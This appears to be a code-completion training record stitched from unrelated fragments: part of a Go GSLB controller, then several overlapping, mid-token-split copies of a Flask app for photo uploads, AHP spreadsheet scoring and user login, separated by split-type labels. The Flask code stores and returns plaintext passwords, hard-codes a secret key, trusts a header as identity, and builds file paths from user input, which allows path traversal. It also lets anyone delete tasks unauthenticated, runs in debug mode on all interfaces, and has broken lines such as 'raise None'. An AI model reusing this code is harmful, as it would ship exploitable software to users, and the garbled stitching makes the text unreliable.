gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
}
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
}
| getObjFromStore | identifier_name |
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit() | folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item) | random_line_split |
|
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8 | thods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item)
| 080, debug=True)
# app.run(debug=True)
@app.route('/page_list', me | conditional_block |
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
| thods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item)
| for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', me | identifier_body |
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
